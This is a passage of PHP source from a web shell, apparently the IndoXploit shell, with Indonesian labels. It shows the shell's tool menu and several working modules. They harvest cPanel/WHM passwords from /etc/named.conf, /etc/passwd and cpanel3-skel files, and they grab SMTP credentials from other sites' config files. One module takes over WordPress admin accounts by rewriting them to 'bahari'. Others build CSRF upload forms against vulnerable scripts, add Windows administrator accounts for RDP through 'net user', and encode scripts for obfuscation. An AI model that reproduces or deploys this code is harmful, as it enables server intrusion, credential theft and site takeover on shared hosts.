  2567. echo "<iframe src='cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  2568. }
  2569. elseif($_GET['do'] == 'tool') {
  2570. echo "<center>";
  2571. echo "<ul>";
  2572. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2573. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2574. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2575. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2576. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2577. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2578. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2579. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2580. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2581. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2582. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2583. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2584. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2585. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2586. echo "</ul>";
  2587. echo "</center>";
  2588. }
  2589. elseif($_GET['do'] == 'manjat') {
  2590. echo "<center>";
  2591. echo "<ul>";
  2592. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2593. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2594. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2595. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2596. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2597. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2598. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2599. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2600. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2601. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2602. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2603. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2604. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2605. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2606. echo "</ul>";
  2607. echo "</center>";
  2608.  
  2609. echo "<center>";
  2610. $d0mains = @file('/etc/named.conf');
  2611. $domains = scandir("/var/named");
  2612.  
  2613. if ($domains or $d0mains)
  2614. {
  2615. $domains = scandir("/var/named");
  2616. if($domains) {
  2617. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
  2618. $count=1;
  2619. $dc = 0;
  2620. $list = scandir("/var/named");
  2621. foreach($list as $domain){
  2622. if(strpos($domain,".db")){
  2623. $domain = str_replace('.db','',$domain);
  2624. $owner = posix_getpwuid(fileowner("/etc/valiases/".$domain));
  2625. $dirz = '/home/'.$owner['name'].'/cpanel3-skel';
  2626. $path = getcwd();
  2627.  
  2628. if (is_readable($dirz)) {
  2629. copy($dirz, ''.$path.'/lol/'.$owner['name'].'.txt');
  2630. $p=file_get_contents(''.$path.'/lol/'.$owner['name'].'.txt');
  2631. $password=entre2v2($p,'password="','"');
  2632. echo "<tr><td>".$count++."</td><td><a href='http://$domain' target='_blank'>".$domain."</a></td><td>".$owner['name']."</td><td>".$password."</td></tr>";
  2633. $dc++;
  2634. }
  2635.  
  2636. }
  2637. }
  2638. echo '</table>';
  2639. $total = $dc;
  2640. echo '<br><div class="result">Total WHM User Found = '.$total.'</h3><br />';
  2641. echo '</center>';
  2642. }else{
  2643. $d0mains = @file('/etc/named.conf');
  2644. if($d0mains) {
  2645. echo "<table align='center'><tr><th> COUNT </th><th> DOMAIN </th><th> USER </th></tr>";
  2646. $count=1;
  2647. $dc = 0;
  2648. $mck = array();
  2649. foreach($d0mains as $d0main){
  2650. if(@eregi('zone',$d0main)){
  2651. preg_match_all('#zone "(.*)"#',$d0main,$domain);
  2652. flush();
  2653. if(strlen(trim($domain[1][0])) >2){
  2654. $mck[] = $domain[1][0];
  2655. }
  2656. }
  2657. }
  2658. $mck = array_unique($mck);
  2659. $usr = array();
  2660. $dmn = array();
  2661. foreach($mck as $o) {
  2662. $infos = @posix_getpwuid(fileowner("/etc/valiases/".$o));
  2663. $usr[] = $infos['name'];
  2664. $dmn[] = $o;
  2665. }
  2666. array_multisort($usr,$dmn);
  2667. $dt = file('/etc/passwd');
  2668. $passwd = array();
  2669. foreach($dt as $d) {
  2670. $r = explode(':',$d);
  2671. if(strpos($r[5],'home')) {
  2672. $passwd[$r[0]] = $r[5];
  2673. }
  2674. }
  2675. $l=0;
  2676. $j=1;
  2677. foreach($usr as $r) {
  2678. $dirz = '/home/'.$r.'/cpanel3-skel';
  2679. $path = getcwd();
  2680. if (is_readable($dirz)) {
  2681. copy($dirz, ''.$path.'/lol/'.$r.'.txt');
  2682. $p=file_get_contents(''.$path.'/lol/'.$r.'.txt');
  2683. $password=entre2v2($p,'password="','"');
  2684. echo "<tr><td>".$count++."</td><td><a target='_blank' href=http://".$dmn[$j-1].'/>'.$dmn[$j-1].' </a></td><td>'.$r."</td><td>".$password."</td><td></tr>";
  2685. $dc++;
  2686. flush();
  2687. $l=$l?0:1;
  2688. $j++;
  2689. }
  2690. }
  2691. }
  2692. echo '</table>';
  2693. $total = $dc;
  2694. echo '<br><div class="result">Total WHM Account Found = '.$total.'</h3><br />';
  2695. echo '</center>';
  2696.  
  2697. }
  2698. }
  2699.  
  2700. }
  2701. elseif($_GET['do'] == 'smtp') {
  2702. echo "<center>";
  2703. echo "<ul>";
  2704. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2705. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2706. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2707. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2708. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2709. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2710. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2711. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2712. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2713. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2714. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2715. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2716. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2717. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2718. echo "</ul>";
  2719. echo "</center>";
  2720. echo"<center>
  2721. <br><br><br>
  2722. VHosts SMTP Grabber<br><br>
  2723. <form method='post'>
  2724. <textarea style='width: 450px; height: 150px;' name='sites' placeholder='http://domen.com/dir_config/config.txt'></textarea><br>
  2725. <input type='submit' name='go' value='Hajar'>
  2726. </form>";
  2727. $ya=$_POST['go'];
  2728. $co=$_POST['sites'];
  2729.  
  2730. if($ya){
  2731. $e=explode("\r\n",$co);
  2732. foreach($e as $bda){
  2733. //echo '<br>'.$bda;
  2734. $linkof='';
  2735. $dn=($bda).($linkof);
  2736. $file=@file_get_contents($dn);
  2737. if(preg_match("/JConfig|joomla/", $file)) {
  2738. echo'<center><font face="Iceland" color=Red >----------------------------------------------</font></center>';
  2739. echo "<font face='Iceland' color=lime >SMTP USER : </font>".findit($file,"smtpuser = '","'")."<br>";
  2740. echo "<font face='Iceland' color=lime >SMTP PASS : </font>".findit($file,"smtppass = '","'")."<br>";
  2741. echo "<font face='Iceland' color=lime >SMTP HOST : </font>".findit($file,"smtphost = '","'")."<br>";
  2742. echo "<font face='Iceland' color=lime >SMTP PORT : </font>".findit($file,"smtpport = '","'")."<br>";
  2743. echo "<font face='Iceland' color=lime >SMTP AUTH : </font>".findit($file,"smtpauth = '","'")."<br>";
  2744. echo "<font face='Iceland' color=lime >SMTP SECURE : </font>".findit($file,"smtpsecure = '","'")."<br>";
  2745. }
  2746.  
  2747. else{echo "<center><font face='Iceland' color='Red' >".$bda." ----> There is no SMTP </font></center>";}
  2748. echo'<center><font face="Iceland" color=red >----------------------------------------------</font></center>';
  2749. }
  2750.  
  2751. }
  2752.  
  2753.  
  2754. }
  2755. elseif($_GET['do'] == 'scdc') {
  2756. echo "<center>";
  2757. echo "<ul>";
  2758. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2759. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2760. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2761. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2762. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2763. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2764. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2765. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2766. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2767. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2768. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2769. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2770. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2771. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2772. echo "</ul>";
  2773. echo "</center>";
  2774.  
  2775. $text = $_POST['code'];
  2776. echo"<center><br><b>Script Encode and Decode</b><br>
  2777. <form method='post'><br><br><br>
  2778. <textarea style='width: 450px; height: 150px;' name='code' placeholder='scmu'></textarea><br><br>
  2779. <select class='inputz' size='1' name='ope'>
  2780. <option value='base64'>Base64</option>
  2781. <option value='gzinflate'>str_rot13 - gzinflate - base64</option>
  2782. <option value='str'>str_rot13 - gzinflate - str_rot13 - base64</option>
  2783. </select>&nbsp;<input type='submit' name='submit' value='Encrypt'>
  2784. <input type='submit' name='submits' value='Decrypt'>
  2785. </form>";
  2786. $submit = $_POST['submit'];
  2787. if (isset($submit)) {
  2788. $op = $_POST["ope"];
  2789. switch ($op) {
  2790. case 'base64':
  2791. $codi = base64_encode($text);
  2792. break;
  2793. case 'str':
  2794. $codi = (base64_encode(str_rot13(gzdeflate(str_rot13($text)))));
  2795. break;
  2796. case 'gzinflate':
  2797. $codi = base64_encode(gzdeflate(str_rot13($text)));
  2798. break;
  2799. default:
  2800. break;
  2801. }
  2802. }
  2803. $submit = $_POST['submits'];
  2804. if (isset($submit)) {
  2805. $op = $_POST["ope"];
  2806. switch ($op) {
  2807. case 'base64':
  2808. $codi = base64_decode($text);
  2809. break;
  2810. case 'str':
  2811. $codi = str_rot13(gzinflate(str_rot13(base64_decode(($text)))));
  2812. break;
  2813. case 'gzinflate':
  2814. $codi = str_rot13(gzinflate(base64_decode($text)));
  2815. break;
  2816. default:
  2817. break;
  2818. }
  2819. }
  2820. echo "<textarea style='width: 450px; height: 150px;' readonly>$codi</textarea></center><BR><BR>";
  2821. }
  2822. elseif($_GET['do'] == 'csrf') {
  2823. echo "<center>";
  2824. echo "<ul>";
  2825. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2826. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2827. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2828. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2829. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2830. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2831. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2832. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2833. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2834. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2835. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2836. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2837. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2838. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2839. echo "</ul>";
  2840. echo "</center>";
  2841.  
  2842. echo"<center> CSRF ONLINE
  2843. <html>
  2844. <form method='post'>
  2845. <select name='array' required>
  2846. <option value=''>Array</option>
  2847. <option value='files[]'>files []</option>
  2848. <option value='qqfile'>qqfile</option>
  2849. <option value='Filedata'>Filedata</option>
  2850. <option value='FileUpload'>FileUpload</option>
  2851. <option value='userfile'>userfile</option>
  2852. <option value='Uploadfile'>Uploadfile</option>
  2853. <option value='file'>file</option>
  2854. </select>
  2855. <input type='text' name='target' size='50' height='10' placeholder='url http://site.com/bug/vuln.php' style='margin: 5px auto; padding-left: 5px;' required><br>
  2856. <input type='submit' name='kunci' value='Lock!'>
  2857. </form>";
  2858.  
  2859. $url = $_POST['target'];
  2860. $pf = $_POST['array'];
  2861. $terkuncyihh = $_POST['kunci'];
  2862. if($terkuncyihh) {
  2863. echo "<form method='post'
  2864. target='_blank' action='$url'
  2865. enctype='multipart/form-data'>
  2866. <input type='file' name='$pf'>
  2867. <input type='submit' name='g'
  2868. value='Hajar'></form";
  2869. }
  2870. }
  2871. elseif($_GET['do'] == 'dos') {
  2872. echo "<center>";
  2873. echo "<ul>";
  2874. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2875. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2876. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2877. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2878. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2879. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2880. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2881. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2882. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2883. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2884. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2885. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2886. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2887. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2888. echo "</ul>";
  2889. echo "</center>";
  2890.  
  2891. $all = array();
  2892. // domain finder.
  2893. $d0mains = file('/etc/named.conf');
  2894. $domains = scandir("/var/named");
  2895.  
  2896. if($domains or $d0mains){
  2897. $count = 0;
  2898. if($domains){
  2899. echo "<center><h1>Count Domains on user</h1></center><br><br>";
  2900. $cur = array();
  2901. foreach($domains as $domain){
  2902. if(strpos($domain, '.db')){
  2903. $dom = str_replace('.db', '', $domain);
  2904. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  2905. $user = $own['name'];
  2906. $all[$user][] = $dom;
  2907. //echo "$user: $dom<br/>";
  2908. }
  2909. }
  2910. echo "";
  2911. }
  2912. elseif($d0mains){
  2913.  
  2914. $mck = array();
  2915. foreach($d0mains as $domain){
  2916. preg_match_all('#zone "(.*)"#',$domain,$dom);
  2917. flush();
  2918. if(strlen(trim($domain[1][0])) >2){
  2919. $mck[] = $dom[1][0];
  2920. }
  2921. }
  2922.  
  2923. $mck = array_unique($mck);
  2924. foreach($mck as $dom){
  2925. $own = posix_getpwuid(fileowner("/etc/valiases/$dom"));
  2926. $user = $own['name'];
  2927. $all[$user][] = $dom;
  2928. //echo "$user: $dom<br/>";
  2929. }
  2930. echo "";
  2931. }
  2932. }
  2933. foreach($all as $user => $domain){
  2934. echo "<center>User <font color='red'>$user</font> has <font color='red'>".count($domain)."</font> Domains below :<br></center>";
  2935. echo "<center>---------------<br>";
  2936. foreach($domain as $v){
  2937. echo "<center><a href='http://$v/' target='_blank'>http://$v<a><br></center>";
  2938. }
  2939. echo "<center>---------------";
  2940. echo "<br><br>";
  2941. }
  2942.  
  2943. }
  2944. elseif($_GET['do'] == 'wpes') {
  2945. echo "<center>";
  2946. echo "<ul>";
  2947. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  2948. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  2949. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  2950. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  2951. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  2952. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  2953. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  2954. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  2955. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  2956. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  2957. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  2958. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  2959. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  2960. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  2961. echo "</ul>";
  2962. echo "</center>";
  2963.  
  2964. if($_POST['auto_deface_wp']) {
  2965. function anucurl($sites) {
  2966. $ch = curl_init($sites);
  2967. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2968. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2969. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2970. curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  2971. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2972. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2973. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2974. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2975. curl_setopt($ch, CURLOPT_COOKIESESSION,true);
  2976. $data = curl_exec($ch);
  2977. curl_close($ch);
  2978. return $data;
  2979. }
  2980. function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  2981. $post = array(
  2982. "log" => "$userr",
  2983. "pwd" => "$pass",
  2984. "rememberme" => "forever",
  2985. "wp-submit" => "$wp_submit",
  2986. "redirect_to" => "$web",
  2987. "testcookie" => "1",
  2988. );
  2989. $ch = curl_init($cek);
  2990. curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  2991. curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  2992. curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  2993. curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  2994. curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  2995. curl_setopt($ch, CURLOPT_POST, 1);
  2996. curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  2997. curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  2998. curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  2999. curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3000. $data = curl_exec($ch);
  3001. curl_close($ch);
  3002. return $data;
  3003. }
  3004. $link = explode("\r\n", $_POST['link']);
  3005. $script = htmlspecialchars($_POST['script']);
  3006. $user = "bahari";
  3007. $pass = "bahari";
  3008. $passx = md5($pass);
  3009. foreach($link as $dir_config) {
  3010. $config = anucurl($dir_config);
  3011. $dbhost = ambilkata($config,"DB_HOST', '","'");
  3012. $dbuser = ambilkata($config,"DB_USER', '","'");
  3013. $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3014. $dbname = ambilkata($config,"DB_NAME', '","'");
  3015. $dbprefix = ambilkata($config,"table_prefix = '","'");
  3016. $prefix = $dbprefix."users";
  3017. $option = $dbprefix."options";
  3018. $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3019. $db = mysql_select_db($dbname);
  3020. $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3021. $result = mysql_fetch_array($q);
  3022. $id = $result[ID];
  3023. $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3024. $result2 = mysql_fetch_array($q2);
  3025. $target = $result2[option_value];
  3026. if($target == '') {
  3027. echo "Error, Cant edit the user :(</font><br>";
  3028. } else {
  3029. echo "<font color='lime'>Done</font> >> <a href='$target/wp-login.php' target='_blank'> $target <a><br>
  3030. <font color='lime'>User</font> : bahari<br>
  3031. <font color='lime'>Password</font> : bahari<br>";
  3032. }
  3033. $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3034. if(!$conn OR !$db OR !$update) {
  3035. echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3036. mysql_close($conn);
  3037. } else {
  3038. }
  3039. }
  3040. } else {
  3041. echo "<center><h1>WordPress Auto Edit User</h1>
  3042. <form method='post'>
  3043. Link Config: <br>
  3044. <textarea name='link' placeholder='http://target.com/btm_conf/user-config.txt' style='width: 450px; height:250px;'></textarea><br>
  3045. <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar'>
  3046. </form></center>";
  3047. }
  3048. }
  3049. elseif($_GET['do'] == 'rdp') {
  3050. echo "<center>";
  3051. echo "<ul>";
  3052. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3053. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3054. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3055. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3056. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3057. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3058. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3059. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3060. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3061. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3062. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3063. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3064. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3065. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3066. echo "</ul>";
  3067. echo "</center>";
  3068. if(strtolower(substr(PHP_OS, 0, 3)) === 'win') {
  3069. if($_POST['create']) {
  3070. $user = htmlspecialchars($_POST['user']);
  3071. $pass = htmlspecialchars($_POST['pass']);
  3072. if(preg_match("/$user/", exe("net user"))) {
  3073. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> sudah ada</font>";
  3074. } else {
  3075. $add_user = exe("net user $user $pass /add");
  3076. $add_groups1 = exe("net localgroup Administrators $user /add");
  3077. $add_groups2 = exe("net localgroup Administrator $user /add");
  3078. $add_groups3 = exe("net localgroup Administrateur $user /add");
  3079. echo "<center>[ RDP ACCOUNT INFO ]<br>
  3080. ------------------------------<br>
  3081. IP: <font color=lime>".$ip."</font><br>
  3082. Username: <font color=lime>$user</font><br>
  3083. Password: <font color=lime>$pass</font><br>
  3084. ------------------------------<br><br>
  3085. [ STATUS ]<br>
  3086. ------------------------------<br>
  3087. </center>";
  3088. if($add_user) {
  3089. echo "[add user] -> <font color='lime'>Berhasil</font><br>";
  3090. } else {
  3091. echo "[add user] -> <font color='red'>Gagal</font><br>";
  3092. }
  3093. if($add_groups1) {
  3094. echo "[add localgroup Administrators] -> <font color='lime'>Berhasil</font><br>";
  3095. } elseif($add_groups2) {
  3096. echo "[add localgroup Administrator] -> <font color='lime'>Berhasil</font><br>";
  3097. } elseif($add_groups3) {
  3098. echo "[add localgroup Administrateur] -> <font color='lime'>Berhasil</font><br>";
  3099. } else {
  3100. echo "[add localgroup] -> <font color='red'>Gagal</font><br>";
  3101. }
  3102. echo "------------------------------<br>";
  3103. }
  3104. } elseif($_POST['s_opsi']) {
  3105. $user = htmlspecialchars($_POST['r_user']);
  3106. if($_POST['opsi'] == '1') {
  3107. $cek = exe("net user $user");
  3108. echo "Checking username <font color=lime>$user</font> ....... ";
  3109. if(preg_match("/$user/", $cek)) {
  3110. echo "[ <font color=lime>Sudah ada</font> ]<br>
  3111. ------------------------------<br><br>
  3112. <pre>$cek</pre>";
  3113. } else {
  3114. echo "[ <font color=red>belum ada</font> ]";
  3115. }
  3116. } elseif($_POST['opsi'] == '2') {
  3117. $cek = exe("net user $user indoxploit");
  3118. if(preg_match("/$user/", exe("net user"))) {
  3119. echo "[change password: <font color=lime>indoxploit</font>] -> ";
  3120. if($cek) {
  3121. echo "<font color=lime>Berhasil</font>";
  3122. } else {
  3123. echo "<font color=red>Gagal</font>";
  3124. }
  3125. } else {
  3126. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  3127. }
  3128. } elseif($_POST['opsi'] == '3') {
  3129. $cek = exe("net user $user /DELETE");
  3130. if(preg_match("/$user/", exe("net user"))) {
  3131. echo "[remove user: <font color=lime>$user</font>] -> ";
  3132. if($cek) {
  3133. echo "<font color=lime>Berhasil</font>";
  3134. } else {
  3135. echo "<font color=red>Gagal</font>";
  3136. }
  3137. } else {
  3138. echo "[INFO] -> <font color=red>user <font color=lime>$user</font> belum ada</font>";
  3139. }
  3140. } else {
  3141. //
  3142. }
  3143. } else {
  3144. echo "<center>-- Create RDP --<br>
  3145. <form method='post'>
  3146. <input type='text' name='user' placeholder='username' value='denita' required>
  3147. <input type='text' name='pass' placeholder='password' value='denita' required>
  3148. <input type='submit' name='create' value='>>'>
  3149. </form>
  3150. -- Option --<br>
  3151. <form method='post'>
  3152. <input type='text' name='r_user' placeholder='username' required>
  3153. <select name='opsi'>
  3154. <option value='1'>Cek Username</option>
  3155. <option value='2'>Ubah Password</option>
  3156. <option value='3'>Hapus Username</option>
  3157. </select>
  3158. <input type='submit' name='s_opsi' value='>>'>
  3159. </form></center>
  3160. ";
  3161. }
  3162. } else {
  3163. echo "<font color=red>Fitur ini hanya dapat digunakan dalam Windows Server.</font>";
  3164. }
  3165.  
  3166. }
  3167. elseif($_GET['do'] == 'tetangga') {
  3168. echo "<center>";
  3169. echo "<ul>";
  3170. echo "<li> <a href='?dir=$dir&do=bc'>Simple Back-Connect</a> </li>";
  3171. echo "<li> <a href='?dir=$dir&do=pbc'>Perl Back-Connect</a> </li>";
  3172. echo "<li> <a href='?dir=$dir&do=ptbc'>Python Back-Connect</a> </li>";
  3173. echo "<li> <a href='?dir=$dir&do=portsc'>Port Scanner</a> </li>";
  3174. echo "<li> <a href='?dir=$dir&do=hash'>Hash Identification</a> </li>";
  3175. echo "<li> <a href='?dir=$dir&do=whmcs'>WHMCS Decoder</a> </li>";
  3176. echo "<li> <a href='?dir=$dir&do=tetangga'>Reverse Domain</a> </li>";
  3177. echo "<li> <a href='?dir=$dir&do=wpes'>Auto Edit User WP</a> </li>";
  3178. echo "<li> <a href='?dir=$dir&do=dos'>Domain On User</a> </li><br>";
  3179. echo "<li> <a href='?dir=$dir&do=smtp'>VHosts SMTP Grabber</a> </li>";
  3180. echo "<li> <a href='?dir=$dir&do=csrf'>CSRF ONLINE</a> </li>";
  3181. echo "<li> <a href='?dir=$dir&do=scdc'>Script Decoder</a> </li>";
  3182. echo "<li> <a href='?dir=$dir&do=rdp'>RDP-Creator</a> </li>";
  3183. echo "<li> <a href='?dir=$dir&do=manjat'>WHM-User Checker</a> </li>";
  3184. echo "</ul>";
  3185. echo "</center>";
